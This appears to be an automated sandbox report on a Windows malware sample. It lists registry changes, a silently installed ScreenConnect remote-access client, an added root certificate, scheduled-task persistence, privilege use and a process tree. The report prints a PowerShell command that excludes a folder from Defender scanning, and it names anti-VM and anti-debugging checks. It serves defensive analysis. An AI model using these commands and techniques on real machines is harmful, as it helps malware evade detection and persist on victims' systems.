description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ScreenConnect.WindowsClient.exe -
Kills process with taskkill 5 IoCs
pid Process 2688 taskkill.exe 1720 taskkill.exe 3172 taskkill.exe 4476 taskkill.exe 2440 taskkill.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 02d487f7c7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 02d487f7c7.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 10584 PING.EXE 5436 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3592 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 3036 file.exe 2676 skotes.exe 2992 NN9Dd7c.exe 2056 powershell.exe 1524 powershell.exe 2980 UZAj8wc.exe 2980 UZAj8wc.exe 2980 UZAj8wc.exe 580 msiexec.exe 580 msiexec.exe 3280 02d487f7c7.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 4996 powershell.exe 5260 08d1669db1.exe 2980 UZAj8wc.exe 5840 a1740268cc.exe 5840 a1740268cc.exe 5840 a1740268cc.exe 5840 a1740268cc.exe 5840 a1740268cc.exe 6452 36e225cffd.exe 6692 powershell.exe 680 powershell.exe 4688 77ce657d01.exe 4688 77ce657d01.exe 10348 02e4c18c72.exe 3548 77ce657d01.exe 3548 77ce657d01.exe 3608 powershell.exe 10348 02e4c18c72.exe 10348 02e4c18c72.exe 10348 02e4c18c72.exe 10348 02e4c18c72.exe 10348 02e4c18c72.exe 10800 8d2b699a41.exe 3756 eb73c920fa.exe 3744 powershell.exe 5356 powershell.exe 6204 530b5596f6.exe 2112 cf68e84021.exe 7128 5fd6925fa4.exe 3804 cd12090932.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 3804 cd12090932.exe 3804 cd12090932.exe 10068 Intel_PTT_EK_Recertification.exe 5148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2992 NN9Dd7c.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 680 ga70pjP.exe Token: SeShutdownPrivilege 2304 msiexec.exe Token: SeIncreaseQuotaPrivilege 2304 msiexec.exe Token: SeRestorePrivilege 580 msiexec.exe Token: SeTakeOwnershipPrivilege 580 msiexec.exe Token: SeSecurityPrivilege 580 msiexec.exe Token: SeCreateTokenPrivilege 2304 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2304 msiexec.exe Token: SeLockMemoryPrivilege 2304 msiexec.exe Token: SeIncreaseQuotaPrivilege 2304 msiexec.exe Token: SeMachineAccountPrivilege 2304 msiexec.exe Token: SeTcbPrivilege 2304 msiexec.exe Token: SeSecurityPrivilege 2304 msiexec.exe Token: SeTakeOwnershipPrivilege 2304 msiexec.exe Token: SeLoadDriverPrivilege 2304 msiexec.exe Token: SeSystemProfilePrivilege 2304 msiexec.exe Token: SeSystemtimePrivilege 2304 msiexec.exe Token: SeProfSingleProcessPrivilege 2304 msiexec.exe Token: SeIncBasePriorityPrivilege 2304 msiexec.exe Token: SeCreatePagefilePrivilege 2304 msiexec.exe Token: SeCreatePermanentPrivilege 2304 msiexec.exe Token: SeBackupPrivilege 2304 msiexec.exe Token: SeRestorePrivilege 2304 msiexec.exe Token: SeShutdownPrivilege 2304 msiexec.exe Token: SeDebugPrivilege 2304 msiexec.exe Token: SeAuditPrivilege 2304 msiexec.exe Token: SeSystemEnvironmentPrivilege 2304 msiexec.exe Token: SeChangeNotifyPrivilege 2304 msiexec.exe Token: SeRemoteShutdownPrivilege 2304 msiexec.exe Token: SeUndockPrivilege 2304 msiexec.exe Token: SeSyncAgentPrivilege 2304 msiexec.exe Token: SeEnableDelegationPrivilege 2304 msiexec.exe Token: SeManageVolumePrivilege 2304 msiexec.exe Token: SeImpersonatePrivilege 2304 msiexec.exe Token: SeCreateGlobalPrivilege 2304 msiexec.exe Token: SeCreateTokenPrivilege 2304 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2304 msiexec.exe Token: SeLockMemoryPrivilege 2304 msiexec.exe Token: SeIncreaseQuotaPrivilege 2304 msiexec.exe Token: SeMachineAccountPrivilege 2304 msiexec.exe Token: SeTcbPrivilege 2304 msiexec.exe Token: SeSecurityPrivilege 2304 msiexec.exe Token: SeTakeOwnershipPrivilege 2304 msiexec.exe Token: SeLoadDriverPrivilege 2304 msiexec.exe Token: SeSystemProfilePrivilege 2304 msiexec.exe Token: SeSystemtimePrivilege 2304 msiexec.exe Token: SeProfSingleProcessPrivilege 2304 msiexec.exe Token: SeIncBasePriorityPrivilege 2304 msiexec.exe Token: SeCreatePagefilePrivilege 2304 msiexec.exe Token: SeCreatePermanentPrivilege 2304 msiexec.exe Token: SeBackupPrivilege 2304 msiexec.exe Token: SeRestorePrivilege 2304 msiexec.exe Token: SeShutdownPrivilege 2304 msiexec.exe Token: SeDebugPrivilege 2304 msiexec.exe Token: SeAuditPrivilege 2304 msiexec.exe Token: SeSystemEnvironmentPrivilege 2304 msiexec.exe Token: SeChangeNotifyPrivilege 2304 msiexec.exe Token: SeRemoteShutdownPrivilege 2304 msiexec.exe Token: SeUndockPrivilege 2304 msiexec.exe Token: SeSyncAgentPrivilege 2304 msiexec.exe Token: SeEnableDelegationPrivilege 2304 msiexec.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
pid Process 3036 file.exe 2304 msiexec.exe 2304 msiexec.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 2140 firefox.exe 2140 firefox.exe 7128 5fd6925fa4.exe 2140 firefox.exe 2140 firefox.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe 2140 firefox.exe 2140 firefox.exe 7128 5fd6925fa4.exe 2140 firefox.exe 7128 5fd6925fa4.exe 7128 5fd6925fa4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3036 wrote to memory of 2676 3036 file.exe 30 PID 3036 wrote to memory of 2676 3036 file.exe 30 PID 3036 wrote to memory of 2676 3036 file.exe 30 PID 3036 wrote to memory of 2676 3036 file.exe 30 PID 2676 wrote to memory of 2992 2676 skotes.exe 31 PID 2676 wrote to memory of 2992 2676 skotes.exe 31 PID 2676 wrote to memory of 2992 2676 skotes.exe 31 PID 2676 wrote to memory of 2992 2676 skotes.exe 31 PID 2992 wrote to memory of 2056 2992 NN9Dd7c.exe 34 PID 2992 wrote to memory of 2056 2992 NN9Dd7c.exe 34 PID 2992 wrote to memory of 2056 2992 NN9Dd7c.exe 34 PID 2992 wrote to memory of 2056 2992 NN9Dd7c.exe 34 PID 2992 wrote to memory of 1524 2992 NN9Dd7c.exe 36 PID 2992 wrote to memory of 1524 2992 NN9Dd7c.exe 36 PID 2992 wrote to memory of 1524 2992 NN9Dd7c.exe 36 PID 2992 wrote to memory of 1524 2992 NN9Dd7c.exe 36 PID 2676 wrote to memory of 680 2676 skotes.exe 38 PID 2676 wrote to memory of 680 2676 skotes.exe 38 PID 2676 wrote to memory of 680 2676 skotes.exe 38 PID 2676 wrote to memory of 680 2676 skotes.exe 38 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 680 wrote to memory of 2304 680 ga70pjP.exe 39 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 580 wrote to memory of 376 580 msiexec.exe 41 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 376 wrote to memory of 640 376 MsiExec.exe 42 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1940 2676 skotes.exe 45 PID 2676 wrote to memory of 1728 2676 skotes.exe 46 PID 2676 wrote to memory of 1728 2676 skotes.exe 46 PID 2676 wrote to memory of 1728 2676 skotes.exe 46 PID 2676 wrote to memory of 1728 2676 skotes.exe 46 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 1728 wrote to memory of 2752 1728 8ZVMneG.exe 48 PID 2676 wrote to memory of 2980 2676 skotes.exe 50 PID 2676 wrote to memory of 2980 2676 skotes.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 3576 attrib.exe 3560 attrib.exe 3516 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\vqmxaeos"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
